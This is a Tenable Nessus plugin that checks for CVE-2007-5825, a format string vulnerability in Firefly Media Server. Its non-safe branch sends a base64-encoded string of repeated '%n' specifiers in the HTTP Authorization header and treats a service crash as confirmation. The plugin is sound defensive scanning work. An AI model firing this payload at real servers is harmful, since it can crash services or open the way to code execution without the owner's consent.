#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(27619);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2007-5825");
  script_bugtraq_id(26310);

  script_name(english:"Firefly Media Server HTTP Authentication Format String Vulnerability");
  script_summary(english:"Sends a specially-crafted Authorization request header");

  desc = "
Synopsis :

The remote web server is affected by a format string vulnerability. 

Description :

The remote host is running Firefly Media Server, also known as
mt-daapd, a media streaming server. 

The version of Firefly Media Server installed on the remote host
apparently fails to sanitize user-supplied input before using it as
the format string in a call to 'vsnprintf'' in 'src/webserver.c'. 
Using a specially-crafted HTTP Authorization request header, an
unauthenticated remote attacker can leverage this issue to crash the
affected service or to execute arbitrary code on the affected system,
subject to the privileges under which the service operates. 

See also :

http://www.securityfocus.com/archive/1/483209/30/0/threaded
http://www.nessus.org/u?bd56a4e9

Solution :

Either disable the service or upgrade to Firefly Media Server 0.2.4.1
or later. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_MIXED_ATTACK);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 3689);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");


port = get_http_port(default:3689);
if (!get_port_state(port)) exit(0);


# Make sure it looks like Firefly / mt-daapd.
banner = get_http_banner(port:port);
if (!banner || "mt-daapd/" >!< banner) exit(0);


# Try to exploit the issue.
if (safe_checks())
{
  auth = "Authorization: Basic";
}
else
{
  exploit = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n";
  auth = string("Authorization: Basic ", base64(str:exploit+":"+SCRIPT_NAME));
}

url = "/xml-rpc?method=stats";
req = http_get(item:url, port:port);
req = str_replace(
  string:req,
  find:"User-Agent:",
  replace:string(
    auth, "\r\n",
    "User-Agent:"
  )
);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);


# If safe checks are enabled...
if (safe_checks())
{
  # there's a problem if we see a response with an invalid argument error.
  if (!isnull(res) && "<br>Error: Invalid argument" >< res) security_hole(port);
}
# Otherwise...
else 
{
  # There's a problem if the server is down.
  req2 = http_get(item:url, port:port);
  res2 = http_keepalive_send_recv(port:port, data:req2, bodyonly:FALSE);
  if (res2 == NULL) security_hole(port);
}

